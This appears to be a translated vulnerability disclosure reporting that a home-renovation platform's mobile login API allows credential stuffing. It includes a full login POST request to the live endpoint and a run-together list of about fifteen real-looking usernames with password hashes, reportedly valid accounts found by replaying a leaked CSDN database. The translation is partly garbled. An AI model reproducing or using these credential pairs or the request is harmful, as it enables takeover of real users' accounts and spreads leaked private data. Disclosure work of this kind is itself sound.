A library hit by an interface of Tuba Rabbit's installation and repair network exposes User Login creden( (with account creden)
User Logon creden are disclosed when an interface hits a database (with account creden)
The mobile login interface does not defend against credential stuffing. No restrictions are imposed on the call to the logon interface. After testing, we found that using a leaked database can result in a collision with a large number of valid login accounts.
After testing, we found that using a leaked database can result in a collision with a large number of valid login accounts.
POST http://mobileapi.to8to.com/index.php HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; HUAWEI C199 Build/HuaweiC199; TO8TOAPP)Host: mobileapi.to8to.comConnection: closeAccept-Encoding: gzipContent-Length: 168username=fanzhenkun&model=user&action=owner&appversion=2.5.0&systemversion=19&password=dac80695ee5f7a6c915a84916f16d2f0&channel=%E8%B1%8C%E8%B1%86%E8%8D%9A&version=2.5&
695 672 is a successful login user. Run the csdn library for 10 minutes and 97 accounts are successfully created.
rigxin4692b5920e6a81b19e39ee9d5accb0e3tudiearth9250db41bd1a5c846d3be8b665aac1b5wly1zwss347d2b5dd6c78f37e913c9163e120c09luojiayun0bed82c83b09406ff977f752541f9e96Martin0602823b07f31072d2332bd4137ba51c261fyxb2237da3130fb47e9b3bdc89459d27674476starfxx1235b644b573e87fbeeba702646f65baWhiteWizard7543719c1a48b331872e9fb654bac443oldevil2a6e4aed26d1cb8da6ee17f0d9bca6a2gmcc1795141de8c798fbeac9668234ecc1ccd70d1mikepat666bfd9f0cc586164634e1b9a255069ca5fzas135421158c4b89f7001e03c4d217332ca9d5a7
Solution:
Credential stuffing defense reference: http://www.bkjia.com/Article/201408/327112.html